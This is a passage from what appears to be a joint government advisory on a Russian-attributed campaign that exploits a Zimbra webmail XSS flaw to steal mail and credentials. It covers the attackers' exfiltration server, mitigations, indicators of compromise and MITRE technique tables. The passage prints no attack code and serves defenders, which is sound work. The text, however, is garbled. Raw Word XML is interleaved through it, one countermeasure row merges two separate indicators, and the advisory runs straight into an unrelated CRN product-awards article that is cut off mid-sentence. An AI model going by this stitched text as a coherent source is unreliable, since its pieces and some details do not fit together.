documented in Figure 2, using a URL path of "/v/p" and with a "subtype" key that shows which type of action it logged (start, finish, or error). Catcher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Ulej exfiltrates information to Flowerbed to be handled by a service named Catcher. Catcher is a containerized Python application, running in Docker as part of Flowerbed, which is detailed in the Resource development section. It receives exfiltrated data and temporarily stores it, enabling its eventual transfer to infrastructure designed for long-term, secure storage.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Catcher acts as an HTTP server over port 8000 and a DNS server on port 53. As described in the Resource development section, the Flowerbed project uses an additional Docker container running an Nginx reverse proxy to enable HTTPS support. This reverse proxy uses a certificate generated by Let's Encrypt and forwards all traffic with an SNI containing "*.i.*" to port 8000 within the Catcher container.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DNS service can accept A, AAAA, MX, TXT, and CAA queries. For any MX, AAAA, or CAA queries, the server will always provide an empty response. The system only supports TXT records as needed to process Automatic Certificate Management Environment (ACME) requests, which enable the assignment of Let's Encrypt certificates. If the server receives an A query, Catcher will always respond with the public IP address of the Flowerbed server.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if a query includes a domain formatted as shown in Figure 6 and Figure 7, the service saves a log file in JSON format to disk containing the following details of the DNS query: Time of query, Source IP address for query, Queried domain, and Type of query.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HTTP server typically responds with OK, except in cases where the path is "pixel.gif" when the response contains a 1x1 gif image with a SHA-256 hash of ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629. Like the DNS service, the HTTP service will only log entries when the domain found in the host header of the request follows the expected formatting as seen in Figure 6 and Figure 7. As the HTTPS exfiltration uses non-standardized binary and JSON-formatted payloads when exfiltrating to Catcher, Catcher will check the content type of the request. If the content type is set to "application/json", Catcher encodes the data in Base64 and includes it in the JSON log entry written to disk. If the content type is set to any other value, Catcher leaves the Base64 payload in the JSON log entry blank and saves the payload to a separate file with the same filename as the JSON log entry with a ".bin" file extension. An HTTPS exfiltration event causes Catcher to save a JSON formatted log file to disk containing the following information from the HTTP request: Time, Source IP address, Request method, Host, Path, Query string, Headers, and Base64 payload.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These JSON event log files and binary output files are then initially saved to the directory /root/hits/tmp and later moved to the /root/hits/ready directory once processed. This prevents incomplete files, which are still being uploaded to Catcher, from premature exfiltration from the server. Approximately every 60 seconds, a likely automated workflow establishes a Secure Shell (SSH) connection with the server hosting Flowerbed for a few seconds, almost certainly exfiltrating the data processed by Catcher to non- public-facing infrastructure. The command in Figure 8 also executes hourly to remove all files last modified at least two days ago from the /root/hits/ready directory.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8: Command used for automated directory cleanup Response strategies Mitigations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many cases, by the time an organization identifies a compromise related to this campaign, numerous sensitive and proprietary emails have already been exfiltrated. The significant risk posed by this cyber threat emphasizes the importance for organizations that use ZCS and other similar webmail solutions to take proactive steps to mitigate this risk.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All organizations that use the ZCS webmail service should immediately prioritize ensuring that their ZCS is not running a vulnerable version. A patch for CVE-2025-66376 was released for both 10.1.13 and 10.0.18 versions of ZCS [D3-AH]. If immediate patching is not feasible, organizations should advise employees to use alternative mail clients to access email and avoid using the Classic ZCS webmail client until ZCS is updated to a non- vulnerable version [d3f:Isolate].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System administrators should closely monitor any Internet-connected ZCS or other email systems and the workstations that access those systems and promptly apply available software updates [D3-AH]. Administrators can maintain awareness of active vulnerability exploitation by referencing open source resources, including CISA's Known Exploited Vulnerabilities Catalog and NCSC-UK's Responding to active exploitation of vulnerabilities guidance.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Organizations should consider using a third-party authentication service that supports passkeys for authentication to mediate access to ZCS and other services that do not natively support passkeys. By doing so, organizations can work to eliminate the possibility of automated password collection from autocomplete or password reuse [D3-CH]. However, Application Passcodes may still be necessary and should be monitored closely.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Organizations should implement network monitoring capabilities with collection and short-term retention of packet capture or NetFlow data and maintain log collection and storage [CPG 3.Q]. This will allow organizations to monitor for and identify suspicious network activity [CPG 4.B], such as: Significant amounts of outbound data being sent to IPs associated with VPS providers not used by the organization [D3-NTA]; Frequent DNS queries for a suspicious domain with seemingly random subdomains [D3-DNSTA]; A sudden spike of connections to a server associated with a recently established domain [D3-NTCD]; and Connections to internal services, such as webmail, from VPN providers frequently leveraged by this group for nefarious activity, such as Mullvad VPN [D3-NTCD].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Additionally, for organizations that can inspect the content of outbound HTTPS connections via break-and-inspect infrastructure, security teams should identify traffic matching the characteristics described in the Exfiltration section of this advisory. Indicators of compromise (IOCs) Flowerbed infrastructure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The following indicators have been attributed to use by LAUNDRY BEAR for their campaign targeting ZCS's webmail service as of the publication of this advisory. (Disclaimer: Due to the frequency of operational structure changes by this group, these indicators are intended solely for historic attribution purposes. Some indicators, such as IPs, compromised emails, and domains, may be outdated, so organizations should check for current activity before acting on these IOCs.) Table 7 provides details about the server infrastructure used to host Flowerbed, and Table 8 lists the corresponding SHA-1 hash values for the Let's Encrypt certificates used by that infrastructure [D3-IAA].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7: Flowerbed server infrastructure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Domain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IP Address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First Seen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Last Seen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zmailanalytics[.]com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216.252.238[.]104</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 July 2025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15 October 2025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zimbra-metadata[.]com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216.252.238[.]18</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 August 2025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 October 2025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analyticemailmeter[.]com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37.120.247[.]228</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24 September 2025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 March 2026</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emailanalytics.com[.]ua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185.86.79[.]95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24 September 2025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 March 2026</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mailnalysis[.]com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104.248.134[.]194</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 November 2025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 February 2026</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zimbrastat[.]com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64.226.124[.]190</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 December 2025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 March 2026</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zimbrasoft.com[.]ua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193.238.152[.]66</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 January 2026</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 March 2026</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synacorzimbra[.]nl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216.252.238[.]64</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 February 2026</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30 March 2026</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istc-cloud[.]com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194.156.103[.]193</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 February 2026</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30 March 2026</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8: Flowerbed X.509 certificate SHA-1 hashes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Associated Domain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X.509 SHA-1 Hash</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First Seen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Last Seen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zmailanalytics[.]com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2e4f314bc9943cab5005d6fde0b271c74d47bc9d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 Jul 2025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 Aug 2025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*.i.zmailanalytics[.]com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50a87d926621dd06389ba50d86e0ff574ed713a8</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 Aug 2025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 Oct 2025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*.i.zimbra-metadata[.]com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c5a72420e7bb308d078e62128430897f82194c95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20 Aug 2025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 Oct 2025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*.i.analyticemailmeter[.]com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8959c4d29e29f02ea94ea8bb21c8df2594c5549d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24 Sep 2025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 Nov 2025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*.i.emailanalytics.com[.]ua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62eb76432597694edb01c1fe57aab0cfe03a7178</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25 Sep 2025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27 Sep 2025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*.i.mailnalysis[.]com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cddf5c3be1e07f28140aed165b929bf2d614922a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 Nov 2025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 Dec 2025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*.i.zimbrastat[.]com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18b3ad442ce73cc8656d51d75bbd7c855f2cb7e8</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 Dec 2025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28 Dec 2025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*.i.zimbrasoft.com[.]ua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1b25041ececf2457eef0270fc1d785cec8ec9ded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21 Jan 2026</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 Feb 2026</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*.i.synacorzimbra[.]nl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e4fe6466a4f9a4249fe330651e914e45bbdca44a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 Feb 2026</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22 Mar 2026</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*.i.istc-cloud[.]com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b6b77c9a455225d525834a403ca9ef5481ed0447</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 Feb 2026</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30 Mar 2026</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LAUNDRY BEAR has used the following email addresses to procure resources used for this campaign: ivanka.zurabishvili@proton[.]me, zmul1@buildandconsulting[.]com, garrysmithme@pinmx[.]net, and hostingclient@pinmx[.]net. Phishing distribution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LAUNDRY BEAR primarily relied on ProtonMail for distribution of malicious email. However, as stated above, LAUNDRY BEAR's more recent efforts likely have shifted to distributing the payload through previous victims.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following email addresses have distributed payloads attributed to this campaign: c.laurent.ejfa@proton[.]me, j.moreau.epsc@proton[.]me, liberty.insights@proton[.]me, certain email addresses (presumably compromised) at the isofts.kiev[.]ua domain (i.e., ending with @isofts.kiev[.]ua), and certain email addresses (presumably compromised) at the navs.edu[.]ua domain (i.e., ending with @navs.edu[.]ua).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Additionally, the following are SHA-256 hashes of email samples containing the malicious payload attributed to this campaign: 98df604ecc57f884a2e6ce3266a0013ad64455cac48442c2312cfa4765007aaf, 60db9abae75cd8ccc49dd7ea5feb41677566dcd442f12ebc5745ffd2810fb874, b1f5beb1175fc5c7d1806a2f0d900eb124c54f0286c5c52b66eea7a6633adb1d, and 1517b3caa495f6c4e832df9c75fc94667e3c233773f7fa4e056d5e30e5ead760. Post- compromise artifacts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Currently, the script does not remove artifacts. This leaves additional opportunities to identify victims of this activity. While emphasis should always be placed on consistent monitoring of network traffic and endpoint activity, there are a variety of persistent artifacts described below that can be used to identify victims of this campaign.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Ulej capability relies on creating a significant number of SOAP requests to collect account information for exfiltration. ZCS logs from these requests are stored, by default, in the /opt/zimbra/log/mailbox.log file [D3-PA]. A significant amount of SOAP request activity that aligns with what was described in the Persistence and credential access and Collection sections of this advisory could indicate a potential compromise. Specific examples of high-risk SOAP request activity might include: Many SearchGalRequest command requests from a single user over a short period of time; Use of the CreateAppSpecificPasswordRequest command, especially in cases where it is creating an Application Passcode named "ZimbraWeb"; and Use of the GetScratchCodesRequest command.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LAUNDRY BEAR uses the localStorage property to track what days had emails previously exfiltrated, defenders can use this property to identify victims of this campaign and determine the scope of exfiltrated information [D3-PA]. Review of the items stored in that property for an organization's ZCS webmail client page on an endpoint device could indicate compromise if there are items named with a format of zd_comp_YYYY-MM-DD, as explained in the Collection section of this advisory.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Application Passcodes have non-malicious purposes, in this case instances of these passcodes with the name "ZimbraWeb" are almost certainly malicious. The ZCS webmail application can support 2FA natively and does not require the use of an Application Passcode, so there is no reason that there should be one named "ZimbraWeb."</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In instances where organizations identify victims of this campaign, they should also examine the inbox of the suspected victim for the original phishing email [D3-MA]. If an email that has a payload exploiting CVE-2025- 66376 is discovered, steps should be taken immediately to identify and quarantine other instances of emails with similar body content, senders, and subject lines to prevent further exploitation and exfiltration. Remediation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event an organization identifies activity associated with this campaign, that organization should take steps to minimize further exploitation. The organization should consider requesting that employees minimize use of the ZCS webmail client until the organization updates to a patched version that is not vulnerable to CVE-2025-66376.</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Organizations should use identifiers from the IOCs section of this report to identify any individuals compromised by this campaign and record the date(s) of compromise(s) to determine the scale and scope of emails exfiltrated.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All users from the organization should have all Application Passcodes and 2FA scratch keys revoked. Affected organizations should require all employees to change passwords in line with establishing minimum password strength requirements [CPG 3.B] and creating unique credentials [CPG 3.C], specifically noting that compromised employees might have had any password stored in a password manager exfiltrated. Works cited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 Netherlands General Intelligence and Security Service (AIVD) and Netherlands Defence Intelligence and Security Service (MIVD). AIVD and MIVD identify a new Russian cyber threat actor. 2025.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.aivd.nl/site/binaries/site- content/collections/documents/2025/05/27/aivd-en-mivd-onderkennen-nieuwe- russische- cyberactor/Advisory+AIVD+en+MIVD+Public+report+on+new+cyber+actor.pdf</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 Microsoft Corporation. New Russia-affiliated actor Void Blizzard targets critical sectors for espionage. 2025. https://www.microsoft.com/en- us/security/blog/2025/05/27/new-russia-affiliated-actor-void-blizzard- targets-critical-sectors-for-espionage/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 Palo Alto Networks Unit 42. Russian Global Webmail Espionage. 2026. https://unit42.paloaltonetworks.com/russian-webmail-espionage/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 Proofpoint. TA488 Targets Zimbra Mailservers with Half-Click Exploits. 2026. https://www.proofpoint.com/us/blog/threat-insight/ta488-zcs-exploit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 Seqrite. Operation GhostMail: Russian APT exploits Zimbra Webmail to Target Ukraine State Agency. 2026. https://www.seqrite.com/blog/operation- ghostmail-zimbra-xss-russian-apt-ukraine/ Footnotes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 N'arodn'i 'urad pro kybernetickou a informacn'i bezpecnost 2 Forsvarets Efterretningstjeneste 3 V"alisluureamet 4 Sotilastiedustelu 5 Suojelupoliisi 6 Direction g'en'erale de la s'ecurit'e int'erieure 7 Agence nationale de la s'ecurit'e des syst`emes d'information 8 Agenzia Informazioni e Sicurezza Esterna 9 Agenzia Informazioni e Sicurezza Interna 10 Serviciul de Informatii si Securitate al Republicii Moldova 11 Agencja Wywiadu 12 Sluzba Kontrwywiadu Wojskowego 13 Centro Nacional de Inteligencia 14 Nationellt Cybers"akerhetscenter 15 MITRE and ATT&amp;CK are registered trademarks of The MITRE Corporation. MITRE D3FEND is a trademark of The MITRE Corporation. Acknowledgements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authoring agencies acknowledge the contributions to this advisory from Palo Alto Networks Unit 42 and Proofpoint. Disclaimer of endorsement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information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.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Organizations have no obligation to respond or provide information back to the authoring organizations in response to this joint advisory. If, after reviewing the information provided, an organization decides to provide information to the authoring organizations, reporting must be consistent with all applicable laws and policies. Purpose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document was developed in furtherance of the authoring agencies' cybersecurity missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. Contact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United States organizations National Security Agency Cybersecurity Report Feedback: CybersecurityReports@nsa.gov Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov Media Inquiries / Press Desk: NSA Media Relations: 443-634-0721, MediaRelations@nsa.gov Cybersecurity and Infrastructure Security Agency CISA's 24/7 Operations Center (contact@cisa.dhs.gov), or by calling 1-844- Say-CISA (1-844-729-2472).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Federal Bureau of Investigation If you or someone you know has fallen victim to this campaign, file a complaint with IC3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Defense Counterintelligence and Security Agency DCSA Counterintelligence, Cyber Mission Center, Cyber Threat Operations Branch: DCSA.CI.CyberOps@mail.mil Cleared Contactors (CCs) should contact their DCSA Counterintelligence Special Agent to report information pertaining to suspicious contacts or physical/digital efforts to obtain illegal or unauthorized access to the CC's cleared facility/information, as required by 32 CFR 117.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Media/Public Inquiries: dcsa.quantico.dcsa-hq.mbx.pa@mail.mil Department of Defense Cyber Crime Center Defense Industrial Base Inquiries and Cybersecurity Services: DC3.DCISE@us.af.mil Defense Industrial Base mandatory cyber incident reporting as required by 10 U.S. Code Sections 391 and 393 and Defense Federal Acquisition Regulation Supplement (DFARS) 252.204-7012 is submitted at https://dibnet.dod.mil Media Inquiries / Press Desk: DC3.Information@us.af.mil Naval Criminal Investigative Service To report criminal activity impacting the United States Navy, go to www.ncis.navy.mil and click "Submit a Tip"</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Dutch organizations Defence Intelligence and Security Service (MIVD): https://www.defensie.nl/onderwerpen/m/militaire-inlichtingen-en-veiligheid General Intelligence and Security Service (AIVD): https://www.aivd.nl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Australian organizations Australian Signals Directorate Visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.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Canadian organizations The Canadian Centre for Cyber Security (Cyber Centre), part of the Communications Security Establishment, encourages Canadian organizations to report cyber incidents and to strengthen the security of their networking devices.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Report an incident or suspicious activity to the Cyber Centre by email at contact@cyber.gc.ca, online via the reporting tool Report a cyber incident - Canadian Centre for Cyber Security or by phone at 1-833-CYBER-88 (1-833- 292-3788).</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New Zealand organizations New Zealand National Cyber Security Centre (NCSC-NZ): info@ncsc.govt.nz</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United Kingdom organizations Report significant cyber security incidents to ncsc.gov.uk/report-an- incident (monitored 24/7)</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Estonia organizations Estonian Foreign Intelligence Service (EFIS): info@valisluureamet.ee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Finnish organizations Finnish Security and Intelligence Service: supo.fi/en/contact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French organizations French organizations are encouraged to report suspicious activity or incident related information found in this advisory by contacting ANSSI/CERT-FR at: cert-fr@ssi.gouv.fr or by phone at: 3218 or +33 9 70 83 32 18.</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Italian Organizations Italian External Intelligence and Security Agency (AISE): Visit https://www.sicurezzanazionale.gov.it/ Italian Internal Intelligence and Security Agency (AISI): Visit https://www.sicurezzanazionale.gov.it/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Moldovan organizations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Security and Intelligence Service of the Republic of Moldova (SIS RM): cybersec@sis.md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Polish organizations Polish Foreign Intelligence Agency (AW): ctiteam@aw.gov.pl Appendix A: MITRE ATT&amp;CK tactics and techniques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See Table 9 through Table 19 for all the threat actor tactics and techniques referenced in this advisory.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9: Reconnaissance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Technique Title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Gather Victim Identity Information: Credentials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T1589.001</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payload attempts to intercept a victim's password from their password manager.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Gather Victim Identity Information: Email Addresses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T1589.002</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payload attempts to grab the victim's email address from various data stores.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Search Open Websites/Domains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T1593</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group likely leverages public information to support target development.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Active Scanning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T1595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Port scanning can be used by this group to assist with determining exploitability of identified targets.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Search Open Technical Databases: Scan Databases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T1596.005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Various public datasets can provide information to support discovery of exploitable targets.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Search Closed Sources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T1597</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Previously exfiltrated data can be used to enhance target development efforts.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Search Closed Sources: Purchase Technical Data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T1597.002</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Commercial datasets can also be used to support target development efforts.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10: Resource Development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Technique Title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Acquire Infrastructure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T1583</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group used Mullvad VPN to anonymize traffic sent to operational infrastructure.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Acquire Infrastructure: Virtual Private Server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T1583.003</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group procured VPS servers from a variety of vendors.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Develop Capabilities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T1587</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Ulej capability was developed likely for use by this group to conduct spear phishing campaigns.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Develop Capabilities: Malware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T1587.001</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Development of a novel payload that steals a victim's emails and other sensitive account information.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Develop Capabilities: Exploits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T1587.004</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Development of a novel, at the time, cross-site-scripting (XSS) exploit that enables execution of arbitrary JavaScript.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Obtain Capabilities: Tool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T1588.002</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 source tools, such as Evilginx2, have also been used by the group.</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Obtain Capabilities: Artificial Intelligence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T1588.007</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group appears to have leveraged AI to support development efforts.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Stage Capabilities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T1608</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Flowerbed is deployed to a procured server in the cloud.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11: Initial Access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Technique Title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Valid Accounts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T1078</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actor has used commercial datasets to acquire account credentials and gain unauthorized access to accounts. Additionally, this actor is believed to use previously compromised accounts to conduct spear phishing.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Trusted Relationship</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T1199</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group sends malicious payloads to targeted individuals using previously compromised accounts that might have an established relationship with the target.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Phishing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T1566</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actors used spear phishing to lure users into opening malicious email.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12: Execution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Technique Title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Exploitation for Client Execution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T1203</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 XSS vulnerability was leveraged to execute the JavaScript payload.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13: Persistence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Technique Title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Account Manipulation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T1098</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Enabling IMAP and Application Passcodes provides persistent access to the compromised account.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Modify Authentication Process: Multi-Factor Authentication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T1556.006</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Creating Application Passcodes to bypass 2FA and stealing a user's "Scratch Keys," which can be used in place of a 2FA token.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14: Privilege Escalation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Technique Title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Valid Accounts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T1078</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actor has used commercial datasets to acquire account credentials and gain unauthorized privileged access to accounts.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15: Stealth</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Technique Title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Use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Obfuscated Files or Information: Command Obfuscation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T1027.010</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Obfuscated JavaScript payload sent to targets to exploit the XSS vulnerability.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Obfuscated Files or Information: Encrypted/Encoded File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T1027.013</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JavaScript payload included both a Base64-encoded and XOR-encrypted inner payload.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Obfuscated Files or Information: SVG Smuggling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T1027.017</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payload was contained in an "onload" attribute within an SVG image included in the malicious email.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Use Alternate Authentication Material: Web Session Cookie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T1550.004</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Previous campaigns using AiTM leveraged stealing and use of a victim's session cookies to authenticate.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16: Credential Access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Technique Title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Modify Authentication Process: Multi-Factor Authentication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T1556.006</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Creating Application Passcodes to bypass 2FA and stealing a user's "Scratch Keys," which can be used in place of a 2FA token.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Adversary-in-the-Middle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T1557</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Previous campaigns used Evilginx2 as an AiTM toolkit to intercept credentials and session cookies.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17: Collection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Technique Title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Data Staged: Remote Data Staging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T1074.002</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Exfiltrated data was sent to an actor-controlled VPS prior to assumed long- term storage solutions.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Email Collection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T1114</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group has emphasized collection of emails.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Email Collection: Remote Email Collection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T1114.002</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Emails are collected via API calls to the ZCS mail server and are not collected from emails stored directly on the victim's device.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Automated Collection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T1119</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Upon execution, the JavaScript payload automatically collects all relevant information in stages.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Browser Session Hijacking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T1185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JavaScript payload leverages the user's authenticated browser session to make API requests as the user.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Archive Collected Data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T1560</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Emails are exfiltrated with GZIP compression.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18: Discovery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Technique Title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Account Discovery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T1087</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Stolen Global Access Lists provide the group with new users to target.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19: Exfiltration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Technique Title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Exfiltration Over Alternative Protocol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T1048</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Victim information was exfiltrated over both HTTPS and DNS.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Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol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T1048.002</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payloads, especially ones with large amounts of data, were exfiltrated over HTTPS.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Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non- C2 Protocol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T1048.003</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smaller bandwidth payloads were exfiltrated over DNS using Base32 encoding. Appendix B: MITRE D3FEND countermeasures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See Table 20 for a mapping of several of the cybersecurity countermeasures mentioned in this advisory.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20: MITRE D3FEND Countermeasures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Countermeasure Title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Description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Application Hardening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D3-AH</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Organizations should immediately prioritize patching CVE-2025-66376. Organizations should promptly apply software updates to all email systems.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Isolate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d3f:Isolate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Organizations that cannot feasibly patch should use alternative mail clients.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Credential Hardening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D3-CH</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Organizations should consider using a third-party authentication service that supports passkeys to mediate access to ZCS and other services that do not natively support passkeys.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Network Traffic Analysis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D3-NTA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Organizations should monitor for significant amounts of outbound data being sent to IPs associated with VPS providers not used by the organization.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DNS Traffic Analysis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D3-DNSTA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Organizations should monitor for frequent DNS queries to a suspicious domain for seemingly random subdomains.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Network Traffic Community Deviation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D3-NTCD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Organizations should monitor for a sudden spike of connections to a server associated with a recently established domain.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Organizations should monitor for connections to internal services, such as webmail, from VPN providers.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Identifier Activity Analysis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D3-IAA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Organizations should search for the listed known IOCs.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Process Analysis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D3-PA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Organizations should search ZCS log files for specific commands used by the malicious script.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Organizations should search the localStorage property in web browsers for the ZCS webmail client for "ZimbraWeb" Application Passcodes.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Message Analysis D3-MA Organizations that suspect they have victims of this campaign should search for emails with a malicious payload to identify other victims.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product is provided subject to this Notification and this Privacy &amp; Use policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cybersecurity and Infrastructure Security Agency 2026.07.23 20:36</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.cisa.gov/news-events/cybersecurity-advisories/aa26-204a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The 2026 Tech Innovator Awards: The Finalists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the 2026 CRN Tech Innovator Awards, CRN staff evaluated and selected product finalists and winners across a broad range of IT categories including AI software and infrastructure, AI PCs, data and information management, enterprise networking, and multiple cybersecurity categories. Here's a look at the innovative products that have made the first round of judging.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AI = Accelerating Innovation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IT industry has been pushing new boundaries of innovation in recent years with the advent of artificial intelligence. While such developments as the internet and the advent of cloud computing certainly had major impacts on IT, AI has found its way into just about every IT system and product including PCs, enterprise applications, data management software and cybersecurity tools.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This wave of innovation is spread across the industry, from established IT giants to startups with breakthrough product ideas. IT vendors are rushing to develop new products and adapt their current product portfolios in the face of the AI tsunami, either to reap the advantages of adding AI capabilities or upgrade them to meet the new demands of AI systems.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so many new and updated products creating opportunities for the channel, solution providers face a significant challenge in deciding which products they should add to their tech portfolios and build practices around.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 help solution providers identify products that are truly innovative and offer real value for their customers, the 2026 CRN Tech Innovator Awards showcase IT products that provide significant advances in IT - and partner growth opportunities - across a broad range of technologies. The finalists in the following slides were chosen by CRN staff across 30 product categories.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Descriptions of the winning products, including performance claims and statements of market positions, were provided by IT vendors and have been lightly edited by CRN for space and clarity.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AI Infrastructure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DDN Horizon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DDN Horizon is an AI orchestration platform designed to transform GPU and data infrastructure into secure, multi-tenant, revenue-ready AI-as-a- Service environments. Its unified control plane orchestrates compute, high- performance data services, networking, and AI pipelines, enabling self- service provisioning of AI workspaces and inference services.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built-in policy-driven governance, tenant isolation, lifecycle management, usage tracking, chargeback, and billing, DDN Horizon helps organizations operationalize AI at scale while simplifying operations and improving utilization. The platform is targeted at Nvidia cloud providers, sovereign AI initiatives, governments and national operators, and enterprises building large-scale AI factories or private AI clouds for internal use or commercial service delivery.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F5 BIG-IP v21 For AI Data Delivery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F5 BIG-IP v21.0 extends BIG-IP into AI data delivery and ingestion with native support for S3-compatible storage workflows. It provides a secure, high-performance front door for moving data between AI applications and object storage used for training, fine-tuning, batch inference, embeddings, and RAG.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New S3-aware capabilities help organizations optimize throughput, abstract applications from specific storage backends, and apply intelligent traffic management, health monitoring, automated failover, and centralized policy enforcement across hybrid multi-cloud environments. This allows enterprises to keep AI data pipelines predictable, resilient and secure while simplifying storage changes, scaling operations, and governance.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product is aimed primarily at enterprise organizations running large- scale AI, data-intensive, or hybrid multi-cloud environments that need stronger control over how data is delivered to and from storage.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NetApp AI Data Engine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NetApp AI Data Engine (AIDE) is an end-to-end, storage-integrated AI data service that simplifies and secures the entire AI data pipeline, from discovery and preparation to GenAI app deployment. Built as a native extension of NetApp ONTAP, it delivers unified global data discovery, automated change detection and synchronization, policy-driven governance with built-in guardrails, Nvidia-powered vectorization (with storage efficiency via ONTAP deduplication/compression), and secure retrieval endpoints.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All capabilities run within a unified control plane, eliminating data silos, multiple tools, and complex integrations. It targets enterprises scaling AI and GenAI initiatives, transforming massive unstructured data estates into always-fresh, AI-ready assets with enterprise-grade security, compliance, and operational efficiency.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Red Hat AI</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Red Hat AI is a product and services portfolio that accelerates time to market and reduces the operational cost of delivering AI solutions across hybrid cloud environments. With Red Hat AI, organizations can efficiently tune small, fit-for-purpose models using enterprise-relevant data and deploy them flexibly wherever data resides.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Red Hat AI helps manage and monitor the lifecycle of both predictive and GenAI models at scale, from single-server deployments to highly distributed platforms, powered by open-source technologies and a partner ecosystem that focuses on performance, stability and GPU support across various infrastructures.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portfolio, which includes Red Hat Inference, Red Hat OpenShift AI, Red Hat Enterprise Linux AI and now, Red Hat AI Enterprise, helps provide organizations that require governed, production-grade AI with consistent security, compliance, and operational controls across on-premise and cloud infrastructure.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AI PCs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Acer Chromebook Plus Spin 514 (CPE584-1N)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embodiment of performance and portability, the Acer Chromebook Plus Spin 514 (CPE584-1N) is powered by a MediaTek Kompanio Ultra 910 processor with a built-in NPU to support on-device generative AI and agentic AI. With this powerful technology, Chromebook users will experience enhanced AI- powered productivity, ideal for making the most of the AI-optimized tools in ChromeOS and Gemini.</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Plus, this premium device delivers the latest features and long battery life with military grade durability, so it's great for on the go. It also features a 2-in-1 convertible design with 360-degree hinges that enable use in many settings, including as a traditional laptop or a tablet for note taking and sketching with the optional USI active stylus.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The Chromebook Plus Spin 514 can be purchased with Chrome Enterprise for business, healthcare, IT workers and mobile professionals. It will also be available with Chrome Education Upgrade for seamless device management in schools.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Getac S510AD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Getac's S510AD is a rugged laptop engineered for high-performance computing in demanding fields and industrial environments where traditional devices often fail. As part of Getac's expanding portfolio of Copilot+ PCs, it is powered by AMD Ryzen AI 5 340 / 7 350 processors, enabling real-time diagnostics, intelligent automation and secure offline processing, allowing for faster decisions and greater operational efficiency even in remote or connectivity-limited environments.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Designed for industries such as automotive, manufacturing, utilities, field services, public safety, and defense, the S510AD supports mission-critical workflows with reliability and mobility. Its durable construction, strong connectivity options, and ability to operate in harsh conditions ensures consistent performance in real-world situations, helping professionals stay productive and make informed decisions wherever work takes 